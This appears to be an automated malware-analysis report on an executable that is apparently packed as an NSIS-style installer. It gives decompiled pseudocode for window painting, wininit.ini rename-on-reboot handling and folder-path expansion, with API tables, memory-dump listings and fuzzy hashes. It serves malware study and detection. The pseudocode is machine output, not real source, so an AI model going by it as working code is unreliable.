                                                                                    0x004044a6
                                                                                    0x004044b1
                                                                                    0x004044b4
                                                                                    0x004044bb
                                                                                    0x004044c9
                                                                                    0x004044e1
                                                                                    0x004044e3
                                                                                    0x004044eb
                                                                                    0x004044fa
                                                                                    0x004044fc
                                                                                    0x004044fc
                                                                                    0x004044bb
                                                                                    0x00404506
                                                                                    0x00000000
                                                                                    0x00404511
                                                                                    0x00404515
                                                                                    0x00404526
                                                                                    0x00404526
                                                                                    0x0040452c
                                                                                    0x0040453a
                                                                                    0x0040453a
                                                                                    0x00000000
                                                                                    0x0040453e
                                                                                    0x00404506
                                                                                    0x00404426
                                                                                    0x00000000
                                                                                    0x0040443a
                                                                                    0x00404440
                                                                                    0x00404446
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040446b
                                                                                    0x0040446d
                                                                                    0x00404472
                                                                                    0x00000000
                                                                                    0x00404472
                                                                                    0x00404426
                                                                                    0x004042fc
                                                                                    0x004042ff
                                                                                    0x00404304
                                                                                    0x00404306
                                                                                    0x00404315
                                                                                    0x00404315
                                                                                    0x0040431c
                                                                                    0x0040431f
                                                                                    0x00404321
                                                                                    0x00404326
                                                                                    0x0040432f
                                                                                    0x00404335
                                                                                    0x00404341
                                                                                    0x00404344
                                                                                    0x0040434d
                                                                                    0x00404352
                                                                                    0x00404355
                                                                                    0x0040435a
                                                                                    0x00404371
                                                                                    0x00404378
                                                                                    0x0040438b
                                                                                    0x0040438e
                                                                                    0x004043a3
                                                                                    0x004043aa
                                                                                    0x004043af
                                                                                    0x004043b4
                                                                                    0x004043b4
                                                                                    0x004043c3
                                                                                    0x004043d2
                                                                                    0x004043e4
                                                                                    0x004043e9
                                                                                    0x004043f9
                                                                                    0x004043fb
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                                    • GetDlgItem.USER32 ref: 00404385
                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                                    • GetSysColor.USER32(?), ref: 004043B4
                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                                    • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                                    • GetDlgItem.USER32 ref: 0040445B
                                                                                    • SendMessageA.USER32(00000000), ref: 0040445E
                                                                                    • GetDlgItem.USER32 ref: 00404489
                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                                    • LoadCursorA.USER32 ref: 004044D8
                                                                                    • SetCursor.USER32(00000000), ref: 004044E1
                                                                                    • LoadCursorA.USER32 ref: 004044F7
                                                                                    • SetCursor.USER32(00000000), ref: 004044FA
                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: N$uvlcopdlxoed
                                                                                    • API String ID: 3103080414-3108259567
                                                                                    • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                    • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                                    • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                                    • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f434;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "arability Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f428;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                    0x0040100a
                                                                                    0x00401039
                                                                                    0x00401047
                                                                                    0x0040104d
                                                                                    0x00401051
                                                                                    0x0040105b
                                                                                    0x00401061
                                                                                    0x00401064
                                                                                    0x004010f3
                                                                                    0x00401089
                                                                                    0x0040108c
                                                                                    0x004010a6
                                                                                    0x004010bd
                                                                                    0x004010cc
                                                                                    0x004010cf
                                                                                    0x004010d5
                                                                                    0x004010d9
                                                                                    0x004010e4
                                                                                    0x004010ed
                                                                                    0x004010ef
                                                                                    0x004010ef
                                                                                    0x00401100
                                                                                    0x00401105
                                                                                    0x0040110d
                                                                                    0x00401110
                                                                                    0x00401112
                                                                                    0x00401118
                                                                                    0x0040111f
                                                                                    0x00401126
                                                                                    0x00401130
                                                                                    0x00401142
                                                                                    0x00401156
                                                                                    0x00401160
                                                                                    0x00401165
                                                                                    0x00401165
                                                                                    0x00401110
                                                                                    0x0040116e
                                                                                    0x00000000
                                                                                    0x00401178
                                                                                    0x00401010
                                                                                    0x00401013
                                                                                    0x00401015
                                                                                    0x0040101f
                                                                                    0x0040101f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextA.USER32(00000000,arability Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F$arability Setup
                                                                                    • API String ID: 941294808-1935799845
                                                                                    • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                    • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                                    • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                                    • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405D66, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D66(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c620 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca20, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c220, "%s=%s\r\n", 0x42c620, 0x42ca20);
						_t53 = _t52 + 0x10;
						E0040618A(_t37, 0x400, 0x42ca20, 0x42ca20,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405C90(0x42ca20, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D08(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BF5(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BF5(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C4B(_t24 + _t46, 0x42c220, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D37(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C90(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c620, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                    0x00405d66
                                                                                    0x00405d6f
                                                                                    0x00405d76
                                                                                    0x00405d8a
                                                                                    0x00405db2
                                                                                    0x00405dbd
                                                                                    0x00405dc1
                                                                                    0x00405de1
                                                                                    0x00405de8
                                                                                    0x00405df2
                                                                                    0x00405dff
                                                                                    0x00405e04
                                                                                    0x00405e09
                                                                                    0x00405e0d
                                                                                    0x00405e1c
                                                                                    0x00405e1e
                                                                                    0x00405e2b
                                                                                    0x00405e2f
                                                                                    0x00405eca
                                                                                    0x00000000
                                                                                    0x00405e45
                                                                                    0x00405e52
                                                                                    0x00405e76
                                                                                    0x00405e7a
                                                                                    0x00405e99
                                                                                    0x00405e9d
                                                                                    0x00405e9d
                                                                                    0x00405e9f
                                                                                    0x00405ea8
                                                                                    0x00405eb3
                                                                                    0x00405ebe
                                                                                    0x00405ec4
                                                                                    0x00000000
                                                                                    0x00405ec4
                                                                                    0x00405e7c
                                                                                    0x00405e7f
                                                                                    0x00405e8a
                                                                                    0x00405e86
                                                                                    0x00405e88
                                                                                    0x00405e89
                                                                                    0x00405e89
                                                                                    0x00405e91
                                                                                    0x00405e93
                                                                                    0x00000000
                                                                                    0x00405e93
                                                                                    0x00405e5d
                                                                                    0x00405e63
                                                                                    0x00000000
                                                                                    0x00405e63
                                                                                    0x00405e2f
                                                                                    0x00405e0d
                                                                                    0x00405d8c
                                                                                    0x00405d97
                                                                                    0x00405da0
                                                                                    0x00405da4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405da4
                                                                                    0x00405ed5

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                                    • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                                      • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                                    • wsprintfA.USER32 ref: 00405DDB
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                                    • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                                    • GlobalFree.KERNEL32 ref: 00405EC4
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %s=%s$[Rename]
                                                                                    • API String ID: 2171350718-1727408572
                                                                                    • Opcode ID: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                                    • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                                    • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                                                                                    • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040618A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 72%
                                                                                    			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x63d143
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}



























                                                                                    0x0040618a
                                                                                    0x0040618a
                                                                                    0x0040618a
                                                                                    0x00406190
                                                                                    0x00406195
                                                                                    0x00406197
                                                                                    0x004061a6
                                                                                    0x004061a6
                                                                                    0x004061ae
                                                                                    0x004061af
                                                                                    0x004061b0
                                                                                    0x004061b1
                                                                                    0x004061b4
                                                                                    0x004061bc
                                                                                    0x004061be
                                                                                    0x004061d5
                                                                                    0x004061d8
                                                                                    0x004061d8
                                                                                    0x004063af
                                                                                    0x004063af
                                                                                    0x004063b3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061e5
                                                                                    0x004061eb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061f1
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x004061f8
                                                                                    0x004063a2
                                                                                    0x004063ac
                                                                                    0x004063ae
                                                                                    0x004063ae
                                                                                    0x004063a4
                                                                                    0x004063a6
                                                                                    0x004063a8
                                                                                    0x004063a9
                                                                                    0x004063a9
                                                                                    0x00000000
                                                                                    0x004063a2
                                                                                    0x004061fe
                                                                                    0x00406202
                                                                                    0x00406212
                                                                                    0x00406219
                                                                                    0x0040621c
                                                                                    0x00406224
                                                                                    0x00406227
                                                                                    0x0040622e
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x0040634f
                                                                                    0x00406352
                                                                                    0x00406382
                                                                                    0x00406385
                                                                                    0x0040638a
                                                                                    0x0040638e
                                                                                    0x0040638e
                                                                                    0x00406393
                                                                                    0x00406399
                                                                                    0x0040639b
                                                                                    0x00000000
                                                                                    0x0040639b
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040636c
                                                                                    0x00406373
                                                                                    0x00406359
                                                                                    0x00406360
                                                                                    0x00406360
                                                                                    0x0040637b
                                                                                    0x0040637e
                                                                                    0x00406347
                                                                                    0x00406348
                                                                                    0x00406348
                                                                                    0x00000000
                                                                                    0x0040637e
                                                                                    0x00406238
                                                                                    0x0040623f
                                                                                    0x00406241
                                                                                    0x00406242
                                                                                    0x0040625c
                                                                                    0x0040625c
                                                                                    0x00406263
                                                                                    0x00406263
                                                                                    0x0040626a
                                                                                    0x0040626e
                                                                                    0x0040626e
                                                                                    0x0040626f
                                                                                    0x00406271
                                                                                    0x004062aa
                                                                                    0x004062ad
                                                                                    0x004062bd
                                                                                    0x004062c0
                                                                                    0x004062c8
                                                                                    0x004062ce
                                                                                    0x004062ce
                                                                                    0x0040632d
                                                                                    0x0040632d
                                                                                    0x0040632f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062d2
                                                                                    0x004062d9
                                                                                    0x004062da
                                                                                    0x004062dc
                                                                                    0x004062f6
                                                                                    0x00406304
                                                                                    0x0040630a
                                                                                    0x0040630c
                                                                                    0x0040632a
                                                                                    0x0040632a
                                                                                    0x0040632a
                                                                                    0x00000000
                                                                                    0x0040632a
                                                                                    0x00406312
                                                                                    0x0040631b
                                                                                    0x0040631e
                                                                                    0x00406324
                                                                                    0x00406328
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406328
                                                                                    0x004062de
                                                                                    0x004062e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062f0
                                                                                    0x004062f2
                                                                                    0x004062f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062f4
                                                                                    0x00000000
                                                                                    0x0040632d
                                                                                    0x004062b5
                                                                                    0x00000000
                                                                                    0x00406273
                                                                                    0x0040628e
                                                                                    0x00406293
                                                                                    0x00406296
                                                                                    0x00406336
                                                                                    0x00406336
                                                                                    0x0040633a
                                                                                    0x00406342
                                                                                    0x00406342
                                                                                    0x00000000
                                                                                    0x0040633a
                                                                                    0x004062a0
                                                                                    0x00406331
                                                                                    0x00406331
                                                                                    0x00406334
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406334
                                                                                    0x00406271
                                                                                    0x00406244
                                                                                    0x00406248
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040624a
                                                                                    0x0040624e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406250
                                                                                    0x00406254
                                                                                    0x00000000
                                                                                    0x00406256
                                                                                    0x00406256
                                                                                    0x00000000
                                                                                    0x00406256
                                                                                    0x00406254
                                                                                    0x004063b9
                                                                                    0x004063c3
                                                                                    0x004063cf
                                                                                    0x004063cf
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004062B5
                                                                                    • GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405256,73BCEA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                                    • SHGetPathFromIDListA.SHELL32(73BCEA30,uvlcopdlxoed), ref: 00406312
                                                                                    • CoTaskMemFree.OLE32(73BCEA30), ref: 0040631E
                                                                                    • lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                                    • lstrlenA.KERNEL32(uvlcopdlxoed,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422448,73BCEA30), ref: 00406394
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
